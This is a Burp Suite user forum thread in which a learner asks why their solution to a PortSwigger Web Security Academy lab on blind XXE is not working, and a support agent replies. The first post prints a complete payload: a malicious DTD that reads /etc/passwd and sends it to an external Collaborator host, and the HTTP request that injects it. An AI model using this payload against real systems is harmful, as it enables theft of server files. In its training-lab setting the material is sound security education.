Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Can't solve the lab Exploiting blind XXE to exfiltrate data using a malicious external DTD

Waffles | Last updated: Jul 12, 2023 02:44PM UTC

I think I'm doing everything like in the solutions but I just don't get HTTP Response in the Burp's suite collaborator. // Exploit.dtd: <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://f8oi7k3x2i02qqw9ryy8li90xr3irbf0.oastify.com/?x=%file;'>"> %eval; %exfil; // Request I intercepted and inject with the XXE payload: POST /product/stock HTTP/2 Host: 0ae800670401fcd280fa26cb00da0015.web-security-academy.net Cookie: session=ujcu72jRK2cSht5LEA1LWsAMRYlls56h User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://0ae800670401fcd280fa26cb00da0015.web-security-academy.net/product?productId=1 Content-Type: application/xml Content-Length: 238 Origin: https://0ae800670401fcd280fa26cb00da0015.web-security-academy.net Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aae00dc0444fc3880c62549010e003a.exploit-server.net/exploit.dtd"> %xxe;]> <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

Ben, PortSwigger Agent | Last updated: Jul 13, 2023 07:57AM UTC

Hi André, On the face of it - what you are doing looks correct to me. Would you be able to send us screenshots of how both the malicious DTD file is configured in the exploit server and what you request looks like in Repeater just so that we can see these as they are in Burp and in the lab itself? If it is easier to do this via email (you cannot attach screenshots directly to the forum) then please feel free to send us an email at support@portswigger.net and we can take a look from there. I have just run through this lab and was able to receive an interaction from the Collaborator and, ultimately, solve the lab so it does appear to be working as expected so it would be useful to see those screenshots.

Waffles | Last updated: Jul 13, 2023 02:20PM UTC

I have sent the email to support@portswigger.net with the screenshots.

Ben, PortSwigger Agent | Last updated: Jul 13, 2023 04:24PM UTC